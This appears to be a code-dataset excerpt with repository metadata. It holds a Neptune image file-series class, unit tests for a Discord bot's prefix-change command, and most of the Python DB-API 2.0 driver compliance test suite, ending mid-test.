return FileSeriesVal(values, **kwargs)
def _is_value_type(self, value) -> bool:
return isinstance(value, FileSeriesVal)
@staticmethod
def _get_base64_image_content(file: File) -> str:
if file.path is not None:
if not os.path.exists(file.path):
raise FileNotFound(file.path)
with open(file.path, "rb") as image_file:
file = File.from_stream(image_file)
ext = imghdr.what("", h=file.content)
if not ext:
raise OperationNotSupported(
"FileSeries supports only image files for now. "
"Other file types will be implemented in future."
)
return base64_encode(file.content)
def download(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
for i in range(0, item_count):
self._backend.download_file_series_by_index(
self._container_id, self._container_type, self._path, i, target_dir
)
def download_last(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
if item_count > 0:
self._backend.download_file_series_by_index(
self._container_id,
self._container_type,
self._path,
item_count - 1,
target_dir,
)
else:
raise ValueError("Unable to download last file - series is empty")
def _get_destination(self, destination: Optional[str]):
target_dir = destination
if destination is None:
target_dir = os.path.join("neptune", self._path[-1])
pathlib.Path(os.path.abspath(target_dir)).mkdir(parents=True, exist_ok=True)
return target_dir
| 34.777778
| 85
| 0.65102
|
import imghdr
import os
import pathlib
from typing import List, Optional, Iterable
from neptune.new.internal.utils import base64_encode
from neptune.new.exceptions import FileNotFound, OperationNotSupported
from neptune.new.types import File
from neptune.new.types.series.file_series import FileSeries as FileSeriesVal
from neptune.new.internal.operation import (
ImageValue,
LogImages,
ClearImageLog,
Operation,
)
from neptune.new.attributes.series.series import Series
from neptune.utils import split_to_chunks
Val = FileSeriesVal
Data = File
class FileSeries(Series[Val, Data]):
def _get_log_operations_from_value(
self, value: Val, step: Optional[float], timestamp: float
) -> List[Operation]:
values = [
LogImages.ValueType(
ImageValue(
data=self._get_base64_image_content(val),
name=value.name,
description=value.description,
),
step=step,
ts=timestamp,
)
for val in value.values
]
return [LogImages(self._path, chunk) for chunk in split_to_chunks(values, 1)]
def _get_clear_operation(self) -> Operation:
return ClearImageLog(self._path)
def _data_to_value(self, values: Iterable, **kwargs) -> Val:
return FileSeriesVal(values, **kwargs)
def _is_value_type(self, value) -> bool:
return isinstance(value, FileSeriesVal)
@staticmethod
def _get_base64_image_content(file: File) -> str:
if file.path is not None:
if not os.path.exists(file.path):
raise FileNotFound(file.path)
with open(file.path, "rb") as image_file:
file = File.from_stream(image_file)
ext = imghdr.what("", h=file.content)
if not ext:
raise OperationNotSupported(
"FileSeries supports only image files for now. "
"Other file types will be implemented in future."
)
return base64_encode(file.content)
def download(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
for i in range(0, item_count):
self._backend.download_file_series_by_index(
self._container_id, self._container_type, self._path, i, target_dir
)
def download_last(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
if item_count > 0:
self._backend.download_file_series_by_index(
self._container_id,
self._container_type,
self._path,
item_count - 1,
target_dir,
)
else:
raise ValueError("Unable to download last file - series is empty")
def _get_destination(self, destination: Optional[str]):
target_dir = destination
if destination is None:
target_dir = os.path.join("neptune", self._path[-1])
pathlib.Path(os.path.abspath(target_dir)).mkdir(parents=True, exist_ok=True)
return target_dir
| true
| true
|
f707c07871c15298e2d268bba3388571e000b0b5
| 3,266
|
py
|
Python
|
tests/commands/test_changeprefixcommand.py
|
matthew-robertson/banned-word-tracker
|
32defe7936114258325ef8ba2f740648d43d4abf
|
[
"MIT"
] | 11
|
2019-03-10T18:31:59.000Z
|
2021-02-13T12:42:44.000Z
|
tests/commands/test_changeprefixcommand.py
|
matthew-robertson/banned-word-tracker
|
32defe7936114258325ef8ba2f740648d43d4abf
|
[
"MIT"
] | 51
|
2019-02-21T21:21:59.000Z
|
2022-03-09T01:29:55.000Z
|
tests/commands/test_changeprefixcommand.py
|
matthew-robertson/vore-tracker
|
c35807612397ae7bc540cb0a1af6bf3ec1f98593
|
[
"MIT"
] | 5
|
2018-07-12T06:36:29.000Z
|
2019-01-09T04:11:19.000Z
|
import unittest
from unittest.mock import patch, Mock
import discord
import datetime
from commands import ChangePrefixCommand
from serverobjects.server import DiscordServer
class TestChangePrefixCommand(unittest.TestCase):
def setUp(self):
self.command = ChangePrefixCommand()
self.time = datetime.datetime.now()
self.server_json = {
'server_id' : 1,
'awake' : True,
'timeout_duration_seconds': 1800,
'prefix': '!vt',
'banned_words': [{
'rowid': 1,
'server_id': 1,
'banned_word': 'vore',
'infracted_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'calledout_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'record': {
'record_seconds': 2400,
'infraction_count': 0
}
}]
}
def test_is_command_authorized__no_permissions_disallowed(self):
result = self.command.is_command_authorized()
self.assertFalse(result)
def test_is_command_authorized__non_admin_disallowed(self):
permissions = discord.Permissions()
result = self.command.is_command_authorized(permissions)
self.assertFalse(result)
def test_is_command_authorized__admin_allowed(self):
permissions = discord.Permissions.all()
result = self.command.is_command_authorized(permissions)
self.assertTrue(result)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_full_time_valid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix !testin",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
prefix_patch.assert_called_with({ 'prefix': '!testin' })
self.assertEqual(
retval,
"Cool, from now on you'll need to start a message with '!testin' for me to treat it as a command."
)
self.assertTrue(prefix_patch.called)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_prefix_too_long(self, prefix_patch):
prefix_patch.return_value = False
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix asdfasdfasdf",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
self.assertEqual(
retval,
"Sorry, I don't understand that formatting. I was expecting a new prefix between 1 and 10 characters long."
)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_no_time_invalid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
self.command.execute(server, self.time, message.content, message.author)
self.assertFalse(prefix_patch.called)
| 31.403846
| 110
| 0.671464
|
import unittest
from unittest.mock import patch, Mock
import discord
import datetime
from commands import ChangePrefixCommand
from serverobjects.server import DiscordServer
class TestChangePrefixCommand(unittest.TestCase):
def setUp(self):
self.command = ChangePrefixCommand()
self.time = datetime.datetime.now()
self.server_json = {
'server_id' : 1,
'awake' : True,
'timeout_duration_seconds': 1800,
'prefix': '!vt',
'banned_words': [{
'rowid': 1,
'server_id': 1,
'banned_word': 'vore',
'infracted_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'calledout_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'record': {
'record_seconds': 2400,
'infraction_count': 0
}
}]
}
def test_is_command_authorized__no_permissions_disallowed(self):
result = self.command.is_command_authorized()
self.assertFalse(result)
def test_is_command_authorized__non_admin_disallowed(self):
permissions = discord.Permissions()
result = self.command.is_command_authorized(permissions)
self.assertFalse(result)
def test_is_command_authorized__admin_allowed(self):
permissions = discord.Permissions.all()
result = self.command.is_command_authorized(permissions)
self.assertTrue(result)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_full_time_valid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix !testin",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
prefix_patch.assert_called_with({ 'prefix': '!testin' })
self.assertEqual(
retval,
"Cool, from now on you'll need to start a message with '!testin' for me to treat it as a command."
)
self.assertTrue(prefix_patch.called)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_prefix_too_long(self, prefix_patch):
prefix_patch.return_value = False
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix asdfasdfasdf",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
self.assertEqual(
retval,
"Sorry, I don't understand that formatting. I was expecting a new prefix between 1 and 10 characters long."
)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_no_time_invalid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
self.command.execute(server, self.time, message.content, message.author)
self.assertFalse(prefix_patch.called)
| true
| true
|
f707c090c7c47b564eeb606a924569db3db76f3e
| 32,286
|
py
|
Python
|
StackApp/env/lib/python2.7/site-packages/psycopg2/tests/dbapi20.py
|
jonathanmusila/StackOverflow-Lite
|
a9a03f129592c6f741eb4d1e608ca2db0e40bf11
|
[
"MIT"
] | 34
|
2016-09-30T17:17:58.000Z
|
2022-02-04T15:53:09.000Z
|
StackApp/env/lib/python2.7/site-packages/psycopg2/tests/dbapi20.py
|
jonathanmusila/StackOverflow-Lite
|
a9a03f129592c6f741eb4d1e608ca2db0e40bf11
|
[
"MIT"
] | 23
|
2016-07-21T17:51:07.000Z
|
2018-11-29T15:09:06.000Z
|
StackApp/env/lib/python2.7/site-packages/psycopg2/tests/dbapi20.py
|
jonathanmusila/StackOverflow-Lite
|
a9a03f129592c6f741eb4d1e608ca2db0e40bf11
|
[
"MIT"
] | 18
|
2016-09-30T17:44:05.000Z
|
2021-12-23T07:55:11.000Z
|
#!/usr/bin/env python
''' Python DB API 2.0 driver compliance unit test suite.
This software is Public Domain and may be used without restrictions.
"Now we have booze and barflies entering the discussion, plus rumours of
DBAs on drugs... and I won't tell you what flashes through my mind each
time I read the subject line with 'Anal Compliance' in it. All around
this is turning out to be a thoroughly unwholesome unit test."
-- Ian Bicking
'''
__rcs_id__ = '$Id: dbapi20.py,v 1.11 2005/01/02 02:41:01 zenzen Exp $'
__version__ = '$Revision: 1.12 $'[11:-2]
__author__ = 'Stuart Bishop <stuart@stuartbishop.net>'
import unittest
import time
import sys
# Revision 1.12 2009/02/06 03:35:11 kf7xm
# Tested okay with Python 3.0, includes last minute patches from Mark H.
#
# Revision 1.1.1.1.2.1 2008/09/20 19:54:59 rupole
# Include latest changes from main branch
# Updates for py3k
#
# Revision 1.11 2005/01/02 02:41:01 zenzen
# Update author email address
#
# Revision 1.10 2003/10/09 03:14:14 zenzen
# Add test for DB API 2.0 optional extension, where database exceptions
# are exposed as attributes on the Connection object.
#
# Revision 1.9 2003/08/13 01:16:36 zenzen
# Minor tweak from Stefan Fleiter
#
# Revision 1.8 2003/04/10 00:13:25 zenzen
# Changes, as per suggestions by M.-A. Lemburg
# - Add a table prefix, to ensure namespace collisions can always be avoided
#
# Revision 1.7 2003/02/26 23:33:37 zenzen
# Break out DDL into helper functions, as per request by David Rushby
#
# Revision 1.6 2003/02/21 03:04:33 zenzen
# Stuff from Henrik Ekelund:
# added test_None
# added test_nextset & hooks
#
# Revision 1.5 2003/02/17 22:08:43 zenzen
# Implement suggestions and code from Henrik Eklund - test that cursor.arraysize
# defaults to 1 & generic cursor.callproc test added
#
# Revision 1.4 2003/02/15 00:16:33 zenzen
# Changes, as per suggestions and bug reports by M.-A. Lemburg,
# Matthew T. Kromer, Federico Di Gregorio and Daniel Dittmar
# - Class renamed
# - Now a subclass of TestCase, to avoid requiring the driver stub
# to use multiple inheritance
# - Reversed the polarity of buggy test in test_description
# - Test exception hierarchy correctly
# - self.populate is now self._populate(), so if a driver stub
# overrides self.ddl1 this change propagates
# - VARCHAR columns now have a width, which will hopefully make the
# DDL even more portible (this will be reversed if it causes more problems)
# - cursor.rowcount being checked after various execute and fetchXXX methods
# - Check for fetchall and fetchmany returning empty lists after results
# are exhausted (already checking for empty lists if select retrieved
# nothing
# - Fix bugs in test_setoutputsize_basic and test_setinputsizes
#
def str2bytes(sval):
if sys.version_info < (3,0) and isinstance(sval, str):
sval = sval.decode("latin1")
return sval.encode("latin1")
class DatabaseAPI20Test(unittest.TestCase):
''' Test a database self.driver for DB API 2.0 compatibility.
This implementation tests Gadfly, but the TestCase
is structured so that other self.drivers can subclass this
test case to ensure compiliance with the DB-API. It is
expected that this TestCase may be expanded in the future
if ambiguities or edge conditions are discovered.
The 'Optional Extensions' are not yet being tested.
self.drivers should subclass this test, overriding setUp, tearDown,
self.driver, connect_args and connect_kw_args. Class specification
should be as follows:
import dbapi20
class mytest(dbapi20.DatabaseAPI20Test):
[...]
Don't 'import DatabaseAPI20Test from dbapi20', or you will
confuse the unit tester - just 'import dbapi20'.
'''
# The self.driver module. This should be the module where the 'connect'
# method is to be found
driver = None
connect_args = () # List of arguments to pass to connect
connect_kw_args = {} # Keyword arguments for connect
table_prefix = 'dbapi20test_' # If you need to specify a prefix for tables
ddl1 = 'create table %sbooze (name varchar(20))' % table_prefix
ddl2 = 'create table %sbarflys (name varchar(20))' % table_prefix
xddl1 = 'drop table %sbooze' % table_prefix
xddl2 = 'drop table %sbarflys' % table_prefix
lowerfunc = 'lower' # Name of stored procedure to convert string->lowercase
# Some drivers may need to override these helpers, for example adding
# a 'commit' after the execute.
def executeDDL1(self,cursor):
cursor.execute(self.ddl1)
def executeDDL2(self,cursor):
cursor.execute(self.ddl2)
def setUp(self):
''' self.drivers should override this method to perform required setup
if any is necessary, such as creating the database.
'''
pass
def tearDown(self):
''' self.drivers should override this method to perform required cleanup
if any is necessary, such as deleting the test database.
The default drops the tables that may be created.
'''
con = self._connect()
try:
cur = con.cursor()
for ddl in (self.xddl1,self.xddl2):
try:
cur.execute(ddl)
con.commit()
except self.driver.Error:
# Assume table didn't exist. Other tests will check if
# execute is busted.
pass
finally:
con.close()
def _connect(self):
try:
return self.driver.connect(
*self.connect_args,**self.connect_kw_args
)
except AttributeError:
self.fail("No connect method found in self.driver module")
def test_connect(self):
con = self._connect()
con.close()
def test_apilevel(self):
try:
# Must exist
apilevel = self.driver.apilevel
# Must equal 2.0
self.assertEqual(apilevel,'2.0')
except AttributeError:
self.fail("Driver doesn't define apilevel")
def test_threadsafety(self):
try:
# Must exist
threadsafety = self.driver.threadsafety
# Must be a valid value
self.failUnless(threadsafety in (0,1,2,3))
except AttributeError:
self.fail("Driver doesn't define threadsafety")
def test_paramstyle(self):
try:
# Must exist
paramstyle = self.driver.paramstyle
# Must be a valid value
self.failUnless(paramstyle in (
'qmark','numeric','named','format','pyformat'
))
except AttributeError:
self.fail("Driver doesn't define paramstyle")
def test_Exceptions(self):
# Make sure required exceptions exist, and are in the
# defined hierarchy.
if sys.version[0] == '3': #under Python 3 StardardError no longer exists
self.failUnless(issubclass(self.driver.Warning,Exception))
self.failUnless(issubclass(self.driver.Error,Exception))
else:
self.failUnless(issubclass(self.driver.Warning,StandardError))
self.failUnless(issubclass(self.driver.Error,StandardError))
self.failUnless(
issubclass(self.driver.InterfaceError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.DatabaseError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.OperationalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.IntegrityError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.InternalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.ProgrammingError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.NotSupportedError,self.driver.Error)
)
def test_ExceptionsAsConnectionAttributes(self):
# OPTIONAL EXTENSION
# Test for the optional DB API 2.0 extension, where the exceptions
# are exposed as attributes on the Connection object
# I figure this optional extension will be implemented by any
# driver author who is using this test suite, so it is enabled
# by default.
con = self._connect()
drv = self.driver
self.failUnless(con.Warning is drv.Warning)
self.failUnless(con.Error is drv.Error)
self.failUnless(con.InterfaceError is drv.InterfaceError)
self.failUnless(con.DatabaseError is drv.DatabaseError)
self.failUnless(con.OperationalError is drv.OperationalError)
self.failUnless(con.IntegrityError is drv.IntegrityError)
self.failUnless(con.InternalError is drv.InternalError)
self.failUnless(con.ProgrammingError is drv.ProgrammingError)
self.failUnless(con.NotSupportedError is drv.NotSupportedError)
def test_commit(self):
con = self._connect()
try:
# Commit must work, even if it doesn't do anything
con.commit()
finally:
con.close()
def test_rollback(self):
con = self._connect()
# If rollback is defined, it should either work or throw
# the documented exception
if hasattr(con,'rollback'):
try:
con.rollback()
except self.driver.NotSupportedError:
pass
def test_cursor(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
def test_cursor_isolation(self):
con = self._connect()
try:
# Make sure cursors created from the same connection have
# the documented transaction isolation level
cur1 = con.cursor()
cur2 = con.cursor()
self.executeDDL1(cur1)
cur1.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
cur2.execute("select name from %sbooze" % self.table_prefix)
booze = cur2.fetchall()
self.assertEqual(len(booze),1)
self.assertEqual(len(booze[0]),1)
self.assertEqual(booze[0][0],'Victoria Bitter')
finally:
con.close()
def test_description(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.description,None,
'cursor.description should be none after executing a '
'statement that can return no rows (such as DDL)'
)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(len(cur.description),1,
'cursor.description describes too many columns'
)
self.assertEqual(len(cur.description[0]),7,
'cursor.description[x] tuples must have 7 elements'
)
self.assertEqual(cur.description[0][0].lower(),'name',
'cursor.description[x][0] must return column name'
)
self.assertEqual(cur.description[0][1],self.driver.STRING,
'cursor.description[x][1] must return column type. Got %r'
% cur.description[0][1]
)
# Make sure self.description gets reset
self.executeDDL2(cur)
self.assertEqual(cur.description,None,
'cursor.description not being set to None when executing '
'no-result statements (eg. DDL)'
)
finally:
con.close()
def test_rowcount(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount should be -1 after executing no-result '
'statements'
)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number or rows inserted, or '
'set to -1 after executing an insert statement'
)
cur.execute("select name from %sbooze" % self.table_prefix)
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number of rows returned, or '
'set to -1 after executing a select statement'
)
self.executeDDL2(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount not being reset to -1 after executing '
'no-result statements'
)
finally:
con.close()
lower_func = 'lower'
def test_callproc(self):
con = self._connect()
try:
cur = con.cursor()
if self.lower_func and hasattr(cur,'callproc'):
r = cur.callproc(self.lower_func,('FOO',))
self.assertEqual(len(r),1)
self.assertEqual(r[0],'FOO')
r = cur.fetchall()
self.assertEqual(len(r),1,'callproc produced no result set')
self.assertEqual(len(r[0]),1,
'callproc produced invalid result set'
)
self.assertEqual(r[0][0],'foo',
'callproc produced invalid results'
)
finally:
con.close()
def test_close(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
# cursor.execute should raise an Error if called after connection
# closed
self.assertRaises(self.driver.Error,self.executeDDL1,cur)
# connection.commit should raise an Error if called after connection'
# closed.'
self.assertRaises(self.driver.Error,con.commit)
# connection.close should raise an Error if called more than once
# Issue discussed on DB-SIG: consensus seem that close() should not
# raised if called on closed objects. Issue reported back to Stuart.
# self.assertRaises(self.driver.Error,con.close)
def test_execute(self):
con = self._connect()
try:
cur = con.cursor()
self._paraminsert(cur)
finally:
con.close()
def _paraminsert(self,cur):
self.executeDDL1(cur)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1))
if self.driver.paramstyle == 'qmark':
cur.execute(
'insert into %sbooze values (?)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'numeric':
cur.execute(
'insert into %sbooze values (:1)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'named':
cur.execute(
'insert into %sbooze values (:beer)' % self.table_prefix,
{'beer':"Cooper's"}
)
elif self.driver.paramstyle == 'format':
cur.execute(
'insert into %sbooze values (%%s)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'pyformat':
cur.execute(
'insert into %sbooze values (%%(beer)s)' % self.table_prefix,
{'beer':"Cooper's"}
)
else:
self.fail('Invalid paramstyle')
self.failUnless(cur.rowcount in (-1,1))
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,'cursor.fetchall returned too few rows')
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Cooper's",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
self.assertEqual(beers[1],"Victoria Bitter",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
def test_executemany(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
largs = [ ("Cooper's",) , ("Boag's",) ]
margs = [ {'beer': "Cooper's"}, {'beer': "Boag's"} ]
if self.driver.paramstyle == 'qmark':
cur.executemany(
'insert into %sbooze values (?)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'numeric':
cur.executemany(
'insert into %sbooze values (:1)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'named':
cur.executemany(
'insert into %sbooze values (:beer)' % self.table_prefix,
margs
)
elif self.driver.paramstyle == 'format':
cur.executemany(
'insert into %sbooze values (%%s)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'pyformat':
cur.executemany(
'insert into %sbooze values (%%(beer)s)' % (
self.table_prefix
),
margs
)
else:
self.fail('Unknown paramstyle')
self.failUnless(cur.rowcount in (-1,2),
'insert using cursor.executemany set cursor.rowcount to '
'incorrect value %r' % cur.rowcount
)
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,
'cursor.fetchall retrieved incorrect number of rows'
)
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Boag's",'incorrect data retrieved')
self.assertEqual(beers[1],"Cooper's",'incorrect data retrieved')
finally:
con.close()
def test_fetchone(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchone should raise an Error if called before
# executing a select-type query
self.assertRaises(self.driver.Error,cur.fetchone)
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
self.executeDDL1(cur)
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if a query retrieves '
'no rows'
)
self.failUnless(cur.rowcount in (-1,0))
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchone()
self.assertEqual(len(r),1,
'cursor.fetchone should have retrieved a single row'
)
self.assertEqual(r[0],'Victoria Bitter',
'cursor.fetchone retrieved incorrect data'
)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if no more rows available'
)
self.failUnless(cur.rowcount in (-1,1))
finally:
con.close()
samples = [
'Carlton Cold',
'Carlton Draft',
'Mountain Goat',
'Redback',
'Victoria Bitter',
'XXXX'
]
def _populate(self):
''' Return a list of sql commands to setup the DB for the fetch
tests.
'''
populate = [
"insert into %sbooze values ('%s')" % (self.table_prefix,s)
for s in self.samples
]
return populate
def test_fetchmany(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchmany should raise an Error if called without
#issuing a query
self.assertRaises(self.driver.Error,cur.fetchmany,4)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany()
self.assertEqual(len(r),1,
'cursor.fetchmany retrieved incorrect number of rows, '
'default of arraysize is one.'
)
cur.arraysize=10
r = cur.fetchmany(3) # Should get 3 rows
self.assertEqual(len(r),3,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should get 2 more
self.assertEqual(len(r),2,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should be an empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence after '
'results are exhausted'
)
self.failUnless(cur.rowcount in (-1,6))
# Same as above, using cursor.arraysize
cur.arraysize=4
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany() # Should get 4 rows
self.assertEqual(len(r),4,
'cursor.arraysize not being honoured by fetchmany'
)
r = cur.fetchmany() # Should get 2 more
self.assertEqual(len(r),2)
r = cur.fetchmany() # Should be an empty sequence
self.assertEqual(len(r),0)
self.failUnless(cur.rowcount in (-1,6))
cur.arraysize=6
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchmany() # Should get all rows
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows),6)
self.assertEqual(len(rows),6)
rows = [r[0] for r in rows]
rows.sort()
# Make sure we get the right data back out
for i in range(0,6):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved by cursor.fetchmany'
)
rows = cur.fetchmany() # Should return an empty list
self.assertEqual(len(rows),0,
'cursor.fetchmany should return an empty sequence if '
'called after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,6))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
r = cur.fetchmany() # Should get empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence if '
'query retrieved no rows'
)
self.failUnless(cur.rowcount in (-1,0))
finally:
con.close()
def test_fetchall(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchall should raise an Error if called
# without executing a query that may return rows (such
# as a select)
self.assertRaises(self.driver.Error, cur.fetchall)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
# cursor.fetchall should raise an Error if called
# after executing a a statement that cannot return rows
self.assertRaises(self.driver.Error,cur.fetchall)
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.assertEqual(len(rows),len(self.samples),
'cursor.fetchall did not retrieve all rows'
)
rows = [r[0] for r in rows]
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'cursor.fetchall retrieved incorrect rows'
)
rows = cur.fetchall()
self.assertEqual(
len(rows),0,
'cursor.fetchall should return an empty list if called '
'after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,0))
self.assertEqual(len(rows),0,
'cursor.fetchall should return an empty list if '
'a select query returns no rows'
)
finally:
con.close()
def test_mixedfetch(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
rows1 = cur.fetchone()
rows23 = cur.fetchmany(2)
rows4 = cur.fetchone()
rows56 = cur.fetchall()
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows23),2,
'fetchmany returned incorrect number of rows'
)
self.assertEqual(len(rows56),2,
'fetchall returned incorrect number of rows'
)
rows = [rows1[0]]
rows.extend([rows23[0][0],rows23[1][0]])
rows.append(rows4[0])
rows.extend([rows56[0][0],rows56[1][0]])
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved or inserted'
)
finally:
con.close()
def help_nextset_setUp(self,cur):
''' Should create a procedure called deleteme
that returns two result sets, first the
number of rows in booze then "name from booze"
'''
raise NotImplementedError('Helper not implemented')
#sql="""
# create procedure deleteme as
# begin
# select count(*) from booze
# select name from booze
# end
#"""
#cur.execute(sql)
def help_nextset_tearDown(self,cur):
'If cleaning up is needed after nextSetTest'
raise NotImplementedError('Helper not implemented')
#cur.execute("drop procedure deleteme")
def test_nextset(self):
con = self._connect()
try:
cur = con.cursor()
if not hasattr(cur,'nextset'):
return
try:
self.executeDDL1(cur)
sql=self._populate()
for sql in self._populate():
cur.execute(sql)
self.help_nextset_setUp(cur)
cur.callproc('deleteme')
numberofrows=cur.fetchone()
assert numberofrows[0]== len(self.samples)
assert cur.nextset()
names=cur.fetchall()
assert len(names) == len(self.samples)
s=cur.nextset()
assert s == None,'No more return sets, should return None'
finally:
self.help_nextset_tearDown(cur)
finally:
con.close()
def test_nextset(self):
raise NotImplementedError('Drivers need to override this test')
def test_arraysize(self):
# Not much here - rest of the tests for this are in test_fetchmany
con = self._connect()
try:
cur = con.cursor()
self.failUnless(hasattr(cur,'arraysize'),
'cursor.arraysize must be defined'
)
finally:
con.close()
def test_setinputsizes(self):
con = self._connect()
try:
cur = con.cursor()
cur.setinputsizes( (25,) )
self._paraminsert(cur) # Make sure cursor still works
finally:
con.close()
def test_setoutputsize_basic(self):
# Basic test is to make sure setoutputsize doesn't blow up
con = self._connect()
try:
cur = con.cursor()
cur.setoutputsize(1000)
cur.setoutputsize(2000,0)
